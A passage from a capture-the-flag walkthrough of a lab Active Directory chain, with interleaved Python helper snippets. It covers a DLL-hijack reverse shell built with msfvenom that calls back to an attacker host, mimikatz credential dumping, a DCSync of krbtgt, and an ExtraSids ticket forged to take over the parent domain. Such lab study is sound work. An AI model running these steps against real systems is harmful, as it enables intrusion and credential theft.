After a few tries, I ran the program under ProcMon to see which DLLs it loads:

procmon
Figure 9: Dlls of KasperskyRemovalTool


What is interesting here is that KasperskyRemovalTool.exe tries to load DLLs from its own directory, C:\AVTest, and some of them are not found there. This is the classic DLL search order: for a DLL that is not in KnownDLLs, the loader looks in the application directory before the system directories, so if we can write to C:\AVTest we can drop a DLL with the expected name and have it loaded by whoever runs the program. Let’s give it a try.
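Triage of a ProcMon export, as an added example (not the author’s code): the rows worth acting on are CreateFile lookups that end in NAME NOT FOUND inside the application directory, because the loader checks that directory before System32 for anything not in KnownDLLs. The CSV below is constructed in the layout of ProcMon’s default CSV export and is not a real capture from the lab; the DLL names other than KasperskyRemovalToolLOC.dll are invented.

```python
"""
Added example (not part of the original write-up): triage a ProcMon CSV
export to spot DLLs resolved from the application's own directory, i.e.
DLL search-order hijack candidates. SAMPLE_CSV is CONSTRUCTED in the
default ProcMon export layout; it is not a real capture.
"""
import csv
import io
from pathlib import PureWindowsPath

# Constructed sample export (helper.dll and other.dll are invented names).
SAMPLE_CSV = '''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"6:13:01.0000000 PM","KasperskyRemovalTool.exe","4120","Load Image","C:\\Windows\\System32\\kernel32.dll","SUCCESS","Image Base: 0x7ff8"
"6:13:01.0000001 PM","KasperskyRemovalTool.exe","4120","CreateFile","C:\\AVTest\\KasperskyRemovalToolLOC.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"6:13:01.0000002 PM","KasperskyRemovalTool.exe","4120","CreateFile","C:\\Windows\\System32\\KasperskyRemovalToolLOC.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"6:13:01.0000003 PM","KasperskyRemovalTool.exe","4120","CreateFile","C:\\AVTest\\helper.dll","SUCCESS","Desired Access: Read Attributes"
"6:13:01.0000004 PM","KasperskyRemovalTool.exe","4120","Load Image","C:\\AVTest\\helper.dll","SUCCESS","Image Base: 0x10000000"
"6:13:01.0000005 PM","svchost.exe","900","CreateFile","C:\\Windows\\System32\\other.dll","SUCCESS","Desired Access: Read"
'''


def hijack_candidates(csv_text: str, process: str, app_dir: str) -> dict:
    """Return {dll_name: status} for DLLs `process` looked up inside `app_dir`.

    'missing' -> CreateFile returned NAME NOT FOUND in app_dir: drop a DLL with
                 that name and the loader takes it before System32 (classic hijack).
    'loaded'  -> a DLL that really lives in app_dir: swappable if the directory
                 is writable. KnownDLLs (kernel32 etc.) never hit app_dir, so the
                 System32 rows are ignored by the parent-directory check.
    """
    app = PureWindowsPath(app_dir)  # Windows paths compare case-insensitively
    found = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Process Name"].lower() != process.lower():
            continue
        path = PureWindowsPath(row["Path"])
        if path.suffix.lower() != ".dll" or path.parent != app:
            continue
        if row["Operation"] == "CreateFile" and row["Result"] == "NAME NOT FOUND":
            found.setdefault(path.name, "missing")
        elif row["Operation"] == "Load Image" and row["Result"] == "SUCCESS":
            found[path.name] = "loaded"
    return found


if __name__ == "__main__":
    for name, status in hijack_candidates(SAMPLE_CSV, "KasperskyRemovalTool.exe", r"C:\AVTest").items():
        print(f"{status:8} {name}")
```

A 'missing' entry is the strongest candidate: nothing to overwrite, just drop the file. A 'loaded' entry works too when the directory is writable. Either way the planted DLL must match the process architecture (x86 vs x64), and DllMain runs under the loader lock, so a long-running payload should start its own thread instead of blocking there.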

First, we create the malicious DLL with msfvenom; it must have exactly the same name as the missing DLL we saw in ProcMon:

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.8.2.242 LPORT=4444 -f dll > KasperskyRemovalToolLOC.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes
Msfvenom arguments
  • -p : the payload to use (a plain TCP reverse shell; msfvenom selected the x86 build, which only a 32-bit process can load, and since it works KasperskyRemovalTool.exe must be 32-bit; for a 64-bit target use windows/x64/shell_reverse_tcp)

  • LHOST : our IP address, where the shell connects back

  • LPORT : the port the shell connects back to

  • -f : the output format (here a DLL)


The second step is to upload this DLL into the same directory as the program (Evil-WinRM’s upload command does the job). After 20-30 seconds the program is run again, as the readme suggested, and we get a reverse shell as cpowers@lab.trusted.vl:

nc -lvnp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.132.102.
Ncat: Connection from 10.10.132.102:61114.
Microsoft Windows [Version 10.0.20348.887]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
lab\cpowers


This user is a member of the Domain Admins group. Note the NT AUTHORITY\BATCH group in the token: the binary is indeed launched by a scheduled task, running as cpowers:

C:\Windows\system32>whoami /groups
whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes                                                     
========================================== ================ ============================================= ===============================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group             
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group             
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group             
BUILTIN\Administrators                     Alias            S-1-5-32-544                                  Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\BATCH                         Well-known group S-1-5-3                                       Mandatory group, Enabled by default, Enabled group             
CONSOLE LOGON                              Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group             
LOCAL                                      Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group             
LAB\Domain Admins                          Group            S-1-5-21-2241985869-2159962460-1278545866-512 Mandatory group, Enabled by default, Enabled group             
Authentication authority asserted identity Well-known group S-1-18-1                                      Mandatory group, Enabled by default, Enabled group             
LAB\Denied RODC Password Replication Group Alias            S-1-5-21-2241985869-2159962460-1278545866-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

TRUSTEDDC.TRUSTED.VL

Trust relationship abuse

The name of this chain says it all: there is surely a trust relationship between these two domains, but just to be sure, let’s check with PowerView:

PS C:\Users\Public> Get-DomainTrust -Domain lab.trusted.vl
Get-DomainTrust -Domain lab.trusted.vl


SourceName      : lab.trusted.vl
TargetName      : trusted.vl
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 9/14/2022 6:42:24 PM
WhenChanged     : 1/19/2025 4:51:01 PM


The WITHIN_FOREST attribute tells us this is an intra-forest (parent-child) trust between lab.trusted.vl and trusted.vl. A parent-child trust is always bidirectional and transitive.
Since we are Domain Admins in the child, we can forge a TGT whose PAC carries the forest root’s Enterprise Admins SID in the sIDHistory (ExtraSids) field and use it to access resources of trusted.vl as Enterprise Admins; this works because SID filtering is not applied on intra-forest trusts by default. There is a fabulous article on the subject if you want the details.
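The SID bookkeeping behind this attack, as an added example (not the author’s code): the child domain SID is taken from the whoami /groups and mimikatz output on this page; the forest-root domain SID does not appear on this page, so the S-1-5-21-1-2-3 value in the demo is a placeholder, not the real trusted.vl SID. The functions only derive and sanity-check the identifiers; they do not forge a ticket.

```python
"""
Added example (not part of the original post): SID arithmetic for the
sIDHistory / ExtraSids attack. The child domain SID below comes from this
page's whoami output; the forest-root SID is a PLACEHOLDER assumption.
"""
import re

# Domain-relative SID: S-1-5-21-<three sub-authorities>-<RID>
SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}-(\d+)$")

ENTERPRISE_ADMINS_RID = 519  # exists only in the forest root domain
DOMAIN_ADMINS_RID = 512
KRBTGT_RID = 502


def split_sid(sid: str):
    """Split 'S-1-5-21-A-B-C-RID' into (domain_sid, rid)."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain-relative SID: {sid}")
    return sid.rsplit("-", 1)[0], int(m.group(1))


def extra_sids_for_parent(child_user_sid: str, forest_root_sid: str) -> dict:
    """Identifiers needed to forge a child TGT that is Enterprise Admin in the parent.

    The child domain SID goes into the ticket's domain SID field, the child's
    Domain Admins SID into its groups, and the root domain SID + 519 into
    ExtraSids (sIDHistory). The ticket itself is signed with the child krbtgt key.
    """
    child_domain, _ = split_sid(child_user_sid)
    return {
        "child_domain_sid": child_domain,
        "child_domain_admins": f"{child_domain}-{DOMAIN_ADMINS_RID}",
        "extra_sid": f"{forest_root_sid}-{ENTERPRISE_ADMINS_RID}",
    }


def sid_filtering_applies(trust_attributes: str) -> bool:
    """Default behaviour: intra-forest trusts pass sIDHistory through, while
    forest and external trusts filter it (SID filtering / quarantine)."""
    return "WITHIN_FOREST" not in trust_attributes


if __name__ == "__main__":
    # cpowers' SID as reported by mimikatz on this page.
    CPOWERS = "S-1-5-21-2241985869-2159962460-1278545866-1107"
    # Placeholder root SID: the real trusted.vl SID must be looked up
    # (for example with Get-DomainSID -Domain trusted.vl).
    ROOT_SID_PLACEHOLDER = "S-1-5-21-1-2-3"
    info = extra_sids_for_parent(CPOWERS, ROOT_SID_PLACEHOLDER)
    for k, v in info.items():
        print(f"{k:22} {v}")
    print("SID filtering on WITHIN_FOREST trust:", sid_filtering_applies("WITHIN_FOREST"))
```

The derived child_domain_admins value must equal the LAB\Domain Admins SID printed by whoami /groups above (ending in -512); if it does not, the SID was parsed from the wrong account. The extra_sid is what goes into the forged ticket’s sIDHistory, and it is only honored because the trust is WITHIN_FOREST; across a forest or external trust the same SID would be stripped.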


First step: retrieve the NT hash of cpowers so that all the following operations can be done from Linux rather than Windows (personal preference). To do that I use SafetyKatz:

C:\Users\Public>SafetyKatz.exe "sekurlsa::ekeys" "exit"
SafetyKatz.exe "sekurlsa::ekeys" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # sekurlsa::ekeys

Authentication Id : 0 ; 3803478 (00000000:003a0956)
Session           : Batch from 0
User Name         : cpowers
Domain            : LAB
Logon Server      : LABDC
Logon Time        : 1/19/2025 6:13:01 PM
SID               : S-1-5-21-2241985869-2159962460-1278545866-1107

	 * Username : cpowers
	 * Domain   : LAB.TRUSTED.VL
	 * Password : (null)
	 * Key List :
	   aes256_hmac       cfd7dce3d0c1a17ae08fc653769d<REDACTED>
	   rc4_hmac_nt       322db798a55<REDACTED>
	   rc4_hmac_old      322db798a55<REDACTED>
	   rc4_md4           322db798a55<REDACTED>
	   rc4_hmac_nt_exp   322db798a55<REDACTED>
	   rc4_hmac_old_exp  322db798a55<REDACTED>

Authentication Id : 0 ; 59338 (00000000:0000e7ca)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/19/2025 4:35:21 PM
SID               : S-1-5-90-0-1


Second step is to retrieve the hash of the krbtgt account of the child domain, in our case lab.trusted.vl. We need the hash of this account because TGTs are encrypted with the krbtgt account’s key (not the only reason, but let’s keep it simple).
To do that we can use secretsdump :

$ secretsdump lab.trusted.vl/cpowers@10.10.132.102 -just-dc-user LAB/krbtgt -hashes :322db798a55<REDACTED>
Impacket v0.13.0.dev0+20241210.172718.365fccfc - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404<REDACTED>:c7a03c565c68c<REDACTED>:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:c930ddb15c3f84aafaw<REDACTED>
krbtgt:aes128-cts-hmac-sha1-96:db0b41cedf22<REDACTED>
[*] Cleaning up...
secretsdump arguments
  • domain/user@ip : the credentials of the user we own, used to perform the DCSync

  • -just-dc-user : retrieve only the specified account, not the whole NTDS

  • -hashes : the NT hash of the user, to authenticate with Pass-the-Hash


Third step, we need the SID of the child domain, in our case lab.trusted.vl :

$ lookupsid.py -hashes :"322db798a55f8<REDACTED>" "lab.trusted.vl"/cpowers@"10.10.132.102" | grep "Domain SID"
[*] Domain SID is: S-1-5-21-2241985869-2159962460-1278545866


Fourth step is to grab the SID of the parent domain, in our case trusted.vl, and append to it the RID 519 of the Enterprise Admins group :

PS C:\Users\Public> Get-DomainSID -Domain trusted.vl
Get-DomainSID -Domain trusted.vl
S-1-5-21-3576695518-347000760-3731839591


We can now forge our ticket, with ticketer.py :

$ ticketer.py -nthash "c7a03c565c6<REDACTED>" -domain lab.trusted.vl -domain-sid S-1-5-21-2241985869-2159962460-1278545866 -extra-sid S-1-5-21-3576695518-347000760-3731839591-519 Administrator
Impacket v0.13.0.dev0+20241210.172718.365fccfc - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for lab.trusted.vl/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in Administrator.ccache
ticketer arguments
  • -nthash : the NT hash of krbtgt

  • -domain : the FQDN of the child domain

  • -domain-sid : the SID of the child domain

  • -extra-sid : the SID of the parent domain with the RID of Enterprise Admins appended

  • Administrator : the user name written in the ticket; it can be anything.
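As an added example, not part of the original walkthrough, here is in Python the check that SID filtering performs on the ExtraSids of a TGT coming from a trusted domain: any SID that does not belong to the trusted domain is dropped, and the parent domain’s Enterprise Admins SID injected above is exactly what it catches. This filtering is applied by default on forest and external trusts but not on intra-forest parent-child trusts, which is why the technique works here; the SIDs used as input are the ones from this page and the group names are a constructed lookup table.

```python
import re

# A domain SID is S-1-5-21-<sub1>-<sub2>-<sub3>; the last component is the RID.
DOMAIN_SID_RE = re.compile(r"^(S-1-5-21(?:-\d+){3})-(\d+)$")

# Well-known RIDs whose appearance in a foreign domain's SID is a red flag
# (constructed lookup table for reporting purposes).
PRIVILEGED_RIDS = {
    512: "Domain Admins",
    518: "Schema Admins",
    519: "Enterprise Admins",
}


def split_domain_sid(sid):
    """Return (domain SID, RID) for a domain SID, or (None, None) for any other SID."""
    match = DOMAIN_SID_RE.match(sid)
    if not match:
        return None, None
    return match.group(1), int(match.group(2))


def filter_extra_sids(trusted_domain_sid, extra_sids):
    """Apply SID filtering to the ExtraSids of a ticket issued by a trusted domain.

    Only SIDs that belong to the trusted domain itself are kept. Everything else
    is dropped and returned together with the name of the privileged group it
    would have granted, if any, so that it can be logged or alerted on.
    """
    kept, dropped = [], []
    for sid in extra_sids:
        domain, rid = split_domain_sid(sid)
        if domain == trusted_domain_sid:
            kept.append(sid)
        else:
            dropped.append((sid, PRIVILEGED_RIDS.get(rid, "not privileged")))
    return kept, dropped


if __name__ == "__main__":
    # Constructed input using the SIDs shown on this page: the child domain SID
    # and the parent domain's Enterprise Admins SID that ticketer.py put in the ticket.
    child_sid = "S-1-5-21-2241985869-2159962460-1278545866"
    forged_extra_sids = [
        child_sid + "-1107",                              # cpowers, legitimate
        "S-1-5-21-3576695518-347000760-3731839591-519",   # parent EA, injected
    ]
    kept, dropped = filter_extra_sids(child_sid, forged_extra_sids)
    print("kept   :", kept)
    print("dropped:", dropped)
```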


We now have full access to the domain controller of trusted.vl. We can use psexec to connect and grab the flag, but there’s a trick here.


EFS Encryption

If we try to read the flag, we get an access denied. This is because the file is encrypted using EFS.
If we enumerate the file with the cipher command, we can see that only Administrator can decrypt it :

c:\Users\Administrator\Desktop> cipher /C root.txt

 Listing c:\Users\Administrator\Desktop\
 New files added to this directory will be encrypted.

E root.txt
  Compatibility Level:
    Windows XP/Server 2003

  Users who can decrypt:
    TRUSTED\Administrator [Administrator(Administrator@TRUSTED)]
    Certificate thumbprint: FFA5 6CDD 0797 CFD7 AA58 C004 2368 67D3 1B75 1553 

  Recovery Certificates:
    TRUSTED\Administrator [administrator(administrator@TRUSTED)]
    Certificate thumbprint: 1FB2 6DE1 F581 0571 F3DD 879B F1D5 B72C B481 C6DA 

  Key information cannot be retrieved.

The specified file could not be decrypted.


To read this file, we need an interactive logon session as TRUSTED\Administrator, since the EFS private key is only unlocked in a session where the user’s credentials are supplied. This means connecting through RDP, or using RunasCs as TRUSTED\Administrator.


Thank you for reading this walkthrough, I hope you had a good time and learned new tricks and techniques. I really loved this chain! I mean, I think I love every machine from Vulnlab, it’s really a top tier platform.